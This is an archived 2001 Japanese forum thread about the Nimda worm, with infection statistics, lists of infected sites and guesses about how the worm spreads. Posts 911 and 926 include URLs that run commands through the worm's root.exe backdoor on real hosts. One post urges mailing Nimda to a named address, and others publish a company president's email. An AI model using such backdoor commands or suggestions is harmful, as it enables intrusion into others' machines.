891 :名無しさん@お腹いっぱい。:01/09/29 08:31
>>878

http://www.takara-univ.ac.jp/

やっぱりしまってる。夜閉めて朝開くのか?(^^;

892 :名無しさん@お腹いっぱい。:01/09/29 08:36
>>864
http://wtc.trendmicro.com/wtc/

日本の報告数が昨日の4倍になってるぅ(@@〜☆
これはもう、大流行時の数値だぞ。
再発説は本当だったか?

893 :名無しさん@お腹いっぱい。:01/09/29 08:54
http://www.takara-univ.ac.jp/
今は開いてる…

894 :名無しさん@お腹いっぱい。:01/09/29 09:52
あたりまえかもしれんが、どんなに不自然なところにroot.exeやTFTP.exeおいてあっても、ウイルススキャンソフトはバックドアとして検知しないんだね・・。

895 :名無しさん@お腹いっぱい。:01/09/29 10:53
>>894
それはそうでしょう。注意を促すファイルを親切につくってやっても
見もしないんだから(w

896 :ななし:01/09/29 11:35
>892 リンク先
何で韓国が 1 で 日本が 11127なんだ!

897 :名無しさん@お腹いっぱい。:01/09/29 11:45
ぷららでバックドアあけっぱなしの馬鹿がいた。
前にも違うアドレスでポートスキャンかけてきたのはおまえか?

898 :名無しさん@お腹いっぱい。:01/09/29 12:11
>>896
ワレ大国では、みんなワレのVB持っててもニムダ検知できる最新版のキーが送られてこないのよ(w

899 :名無しさん@お腹いっぱい。:01/09/29 13:57
TPTPのテンポラリらしきものが大量にあるのはニムダ感染?

2001-09-29 01:33p 0 TFTP1124
2001-09-29 01:33p 0 TFTP1256
2001-09-29 01:32p 0 TFTP1628
2001-09-29 01:14p 0 TFTP1728
2001-09-29 01:20p 0 TFTP1740
2001-09-29 01:32p 0 TFTP336
2001-09-29 01:05p 0 TFTP460
2001-09-29 01:43p 0 TFTP676
2001-09-29 12:55p 0 TFTP704
2001-09-29 01:31p 0 TFTP720
2001-09-29 01:00p 0 TFTP748

900 : :01/09/29 14:00
>>896
ウイルスバスターの使用記録だから、使用してない地域では当然
少ない。

901 :名無しさん@お腹いっぱい。:01/09/29 22:41
age

902 :すぱむスパムSPAM:01/09/29 22:52
From : dnaxs384a@msn.com

Reply-To : chantaldenboer2713@excite.com
To : 10bqgh@msn.com
Subject : Got Debt? [ndywg]
Received: from [198.78.9.50] by hotmail.com (3.2) with ESMTP id MHotMail***;
Received: from kkgky.msn.com (212.216.22.67 [212.216.22.67]) by exchange@durdene.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)id S3MJ4TW0; Thu, 27 Sep 2001 21:47:48 -0400
From dnaxs384a@msn.com Thu, 27 Sep 2001 18:37:39 -0700
−−−−−
mail.durdene.com (pri=1)
<<< 220 exchange@mail.durdene.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
<<< 250 OK - mail from <"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection

問題あり:不正な中継を受け付けます。

(198.78.9.50)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

Info@your411ToWin.com

160000001E@mail2.playsic.com

dnaxs384a@msn.com

chantaldenboer2713@excite.com

10bqgh@msn.com

exchange@mail.durdene.com

903 : :01/09/29 22:56
台湾は収束傾向だというのに、日本は横ばいか。
台湾はPC使ってる人のレベルが高いのかな?

904 :名無しさん@お腹いっぱい。:01/09/29 23:16
終わったかと思っていたのに、アメリカの数字が昨日の夕方、現地時間
では朝から急上昇して、今でも高い水準だな。
本当に10日後のリターンマッチ機能付きだったのだろうか。

905 :名無しさん@お腹いっぱい。:01/09/29 23:21
>>903
意識の違いもあると思われ

906 :名無しさん@お腹いっぱい。:01/09/29 23:28
>>905

いらんのに無理して使ってるヒトは台湾にはいない気がする。
「パソコン『ぐらい』使えないと」なんて言葉は台湾にはない気がする。

そんな気がする。

907 :名無しさん@お腹いっぱい。:01/09/29 23:50
http://www.security.nl/
今回ここはニムダに関して世界の被害状況やリアルタイムのアタック数を
Coderedの時みたいに表示してくれないのかなー。
その代わりに今はオサマ・ビン・ラディンの写真が拝める。

908 :ん〜ま:01/09/29 23:52
そろそろ4か。

909 :名無しさん@お腹いっぱい。:01/09/30 00:07
http://3403670532/

910 :名無しさん@お腹いっぱい。:01/09/30 00:09
http://3583770989/

911 :名無しさん@お腹いっぱい。:01/09/30 00:13
http://210.165.239.87/scripts/root.exe?/c%20net%20send%20%*%20%22バックドアあいてるけどやばいんでないの?まだ日本にもセキュリティ甘い馬鹿がいたんだね%22

912 :名無しさん@お腹いっぱい。:01/09/30 00:20
>>911
まだどころかこれからもずっと。
今現在も増殖中で、むしろ現在では大勢を占めている。
最低限のセキュリティの話でもガイキチ扱いだもんなー。
たまんないよ。

913 :>>:01/09/30 00:21
しっかり Admin.dll が 9/28 付けであるな。

914 :911:01/09/30 00:22
これ放置サイトじゃないことは確かだよな。
会社関係のやばいファイルがいっぱいあるぞ。

鍵かけずに帰宅するようなもんだ。

915 :>911:01/09/30 00:27
だからさ、ちゃんと管理する人間がいないところは
自営ドメイン、自前鯖 たてる必要ないんだよね。。
ホスティングの値段どんどんさがってるんだから。。。
どうせ会社紹介程度のWebサイトだろうし。。。

916 :>:01/09/30 00:36
ttp://www.bee.woodland.co.jp/test/kb-index.htm
ここかなり前からだが、、
ウッドランドってプロだろ。なんとかしろよ。。

917 :名無しさん@お腹いっぱい。:01/09/30 00:39
>>911
InfoSphere (NTT PC Communications, Inc.)
ダイヤルアップかフレッツかADSLユーザーのどれかだろう。
鯖立てているとは夢にも思っていないと思う。

918 :名無しさん@お腹いっぱい。:01/09/30 00:48
>>916
こいつにNIMDA付きメール送ってやれ(藁
k-b-homepage@wit.ne.jp

919 :名無しさん@お腹いっぱい。:01/09/30 00:52
>>911
ハァー。。。
パソナルファイアウォルで80へのアタークログみて
慌ててる奴の方がまだましという事だね。。

920 :名無しさん@お腹いっぱい。:01/09/30 01:02
>>919
俺はログ見て楽しんでるが何か?

921 :名無しさん@お腹いっぱい。:01/09/30 01:07
明日でCoderedともお別れだなー。
ログもあんまり見なくなるかもなー。

922 :名無しさん@お腹いっぱい。:01/09/30 12:25
>>915
その通り
Web立ち上げたい会社は、まず身の程を知れ!!

923 :名無しさん@お腹いっぱい。:01/09/30 12:40
この期におよんで感染するなよ・・。

http://www.zumensoft.co.jp/menu.html

924 :名無しさん@お腹いっぱい。:01/09/30 12:44
ここは最近まで感染していたようだ

http://www.sg-jc.ac.jp/Alaska/8_30/AC_8_30.html

</DIV>
</BODY>
</HTML>

<html><script language="JavaScript"></script></html>
<html><script language="JavaScript"></script></html>

925 :名無しさん@お腹いっぱい。:01/09/30 13:12
なんで両側残してあるんだ?

926 :911:01/09/30 13:26
http://210.165.109.119/scripts/root.exe?/c%20net%20send%20*%20%22馬鹿だなぁ。リブートしただけじゃだめなんだってば(笑)%22

同じやつかな?(w おれもADSLだから多分ADSLだと思う
>>917

927 :WARNING:01/09/30 13:28
http://www.bee.woodland.co.jp/test/column/kb-index.asp

928 :>:01/09/30 14:18
926
給与奉行が入ってるで、そのデータとか盗まれたり消されたり
しても知らんぞ

929 :名無しさん@お腹いっぱい。:01/09/30 14:21
ああ、まだやってるのか、近畿なんとか会系
救い様がないな・・・。

930 :>:01/09/30 14:22
ウッドランドがついてながら。。。何やってんだか

931 :名無しさん@お腹いっぱい。:01/09/30 14:26
>>923
そこの掲示板みると、駆除するだけで対策してないみたい。
最低のソフトハウスだな。

932 :>:01/09/30 14:27
http://www.woodland.co.jp
ウッドランド 管理責任ないのかおい

933 :>:01/09/30 14:32
>>931

readme.eml ダウンロードのスクリプト残ったままなんだが
汚れてない原本からコンテンツ再ウプってしないものな普通?

934 :名無しさん:01/09/30 14:36
http://natto.2ch.net/test/read.cgi/isp/1001008018/207

ZAQの馬鹿ユーザーが晒されてます。

935 :死ねって感じ?:01/09/30 14:39
>>123の掲示板の抜粋

私の周りにもウイルスで泣いている人達が少なからずいます。
彼らにはWIN2000に変えるように進めていますが駆除が出来れば
とりあえずはなんとかなると思います。
私を含めてウイルスに苦しんでいる者に救いの手を。
よろしくお願いいたします。深刻になってごめんなさい

936 :名無しさん@お腹いっぱい。:01/09/30 15:21
>>935
>>彼らにはWIN2000に変えるように進めていますが

勢いでIISインストールしたり、パッチ忘れたりしないの?

937 :ほんと氏ねって感じだよ:01/09/30 15:22
>>911 >>926
どうやら閉じたかな?
またreadm.eml消して駆除した気にならなければいいけどね。
恐いのはウィルスそのものではなく感染したらどうなるかを知るべし。

938 :名無しさん@お腹いっぱい。:01/09/30 15:27
>>935
いちおう入れたつもりなくても勝手にIISがインストールされてないか
チェックはしたほうがいいと思う。
>>911 = >>926はその好例だろう。

939 :名無しさん@お腹いっぱい。:01/09/30 15:27
>>937

外から文句言われなくなったらそれでいい、みたいなところも多いな・・。

940 :名無しさん@お腹いっぱい。:01/09/30 15:57
>>923
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>1週間かけて初期化しましたが、1台は残念ながら初期化に失敗、廃材と変わり果てました。

意味不明なんですけど。。。

941 :名無しさん@お腹いっぱい。:01/09/30 16:02
ここで言う初期化=フォーマットではないと思われ。

おそらく物質レベルでの初期状態を目指したものの、還元に失敗し単なる廃材となったと思われ。

942 :名無しさん@お腹いっぱい。:01/09/30 16:06
>>940
>WIN2000は強かった。ウィルスが3000個以上検出されたにもかかわらず、びくともせずに変わりなく動いておりました。

「びくともせずに変わりなく動いて」って、そういう問題じゃないような・・。

943 :ツッコミ所満載:01/09/30 16:07
>>923
WIN2000は強かった。ウィルスが3000個以上検出されたにも
かかわらず、びくともせずに変わりなく動いておりました。
LANさえなければこのまま使いたかったのですが

944 :名無しさん@お腹いっぱい。:01/09/30 16:08
あ、かぶったw

945 :しよ〜しゃたん:01/09/30 16:10
・・・一般人のウィルスに対する認識ってそんなものなのか?
イギリスでのウィルス対策できてない人のISP利用を制限するっていう話があったけど、
日本でもやってほしいよ・・・
そうすれば、インターネット上からDQNが大幅にへって嬉しいこと限りなしなのだが。

946 :名無しさん@お腹いっぱい。:01/09/30 16:23
一般人じゃなく会社みたいね
でも、何でそこまでしてセキュリティ意識が低いことをアピールしたいのか

あ、失うほどの信頼が無いのか(w

947 :名無しさん@お腹いっぱい。:01/09/30 16:33
近いアドレスの人に感染者がいると攻撃されるとか聞いたけど
ここへきてぼろぼろ国内産ダイアルアップが釣れるよ。

国内ホームユーザドキュソは今一度自分は感染してないか要チェック

948 :名無しさん@お腹いっぱい。:01/09/30 16:41
http://3403692948/

949 :名無しさん@お腹いっぱい。:01/09/30 16:44
>>940
TFTPなんたらファイルでハードディスクが一杯になってもハングせず
動いてるってことだと思われ(w

950 :名無しさん@お腹いっぱい。:01/09/30 16:50
>>946
会社というかソフト開発やってる会社ですがw
Presented by Zumen Soft Co,.Ltd

951 :名無しさん@お腹いっぱい。:01/09/30 17:06
夢幻(ユーザー)    井上(会社社長)
↓           ↓
某社(nimda感染)   zumensoft.co.jp
じゃないのか?

952 :名無しさん@お腹いっぱい。:01/09/30 18:42
>>949
初歩的な質問でスマンけど、「TFTPなんたらファイル」って実のところなんなんだっぺ?
ウイルススキャンでひっかかるのとひっかからないのがあるようだが。

まあ、ニムダ感染機ではたいてい増殖してるよね・・。

953 :名無しさん@お腹いっぱい。:01/09/30 18:47
>>944
おそらく、起動不能マシンが出なければ、駆除もスキャンもしなかったと思われ。

954 :名無しさん@お腹いっぱい:01/09/30 20:52
そろそろ新スレか・・

955 :名無しさん@お腹いっぱい。:01/09/30 22:33
>>952
バックドア経由でAdmin.dll(Nimda本体)を送り込む。
 ↓
Admin.dllはすでにある(しかも動いてる)
 ↓
一時ファイル名のまま保存。

って感じかな。たぶん。

956 :名無しさん@お腹いっぱい。:01/09/30 22:41
>>955
NT/2000 Serverだと、TFTPっていうツールがインストールされるんだけど、これは関係ないのかな?

957 :名無しさん@お腹いっぱい。:01/09/30 22:59
TFTPで鯖ってウィルス送り込んでるなら、TFTPコマンドで
ファイルをputできるかなとか思ったんだが無理っぽい。
Pro版だと鯖は入ってないがルーター買うと付いてくるね。

958 :名無しさん@お腹いっぱい。:01/09/30 23:09
>>957
結局にむだでもバックドアではなく、CodeRed同様未対策鯖のバッファオーバーフローを突いて自身を挿入しているということかな?(鯖攻撃で感染の場合)

959 :名無しさん@お腹いっぱい。:01/09/30 23:13
>>956-957
そのTFTPっつーのをつかってgetさせてる。
putしてるんじゃなくて。

960 :名無しさん@お腹いっぱい。:01/09/30 23:24
>>951

ぴんぽん♪

http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs

井上和仁
・・・のところをくりっくすると ρ(^-^)
mailto:inoue@zumensoft.co.jp

961 :名無しさん@お腹いっぱい。:01/09/30 23:34
>>960

しかし、このzumensoft.co.jpにも「夢幻」にも教えてやりたいんだが、ホスト名もIPも晒されるような掲示板では、カキコする気も失せるな。

962 :名無しさん@お腹いっぱい。:01/10/01 00:09
age

963 ::01/10/01 00:35
新スレ建てましょか?

964 :名無しさん@お腹いっぱい。:01/10/01 00:42
>1
よろしく〜

965 ::01/10/01 00:46
新スレです。適宜移動してください。
「Nimda !! 」【その4】
http://ton.2ch.net/test/read.cgi/sec/1001864573/

966 ::01/10/01 01:01
IE6に関するFAQが抜けてますが、
インストールの環境やインストールされてるアプリで変わるので
詳しくまとめた方カキコお願いします。

967 :名無しさん@お腹いっぱい。:01/10/02 01:13
「Nimda !! 」【その4】
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001864573

こう書いて欲しかったYO!
ブラウザで読み込まれたので、ビックリ。

260 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)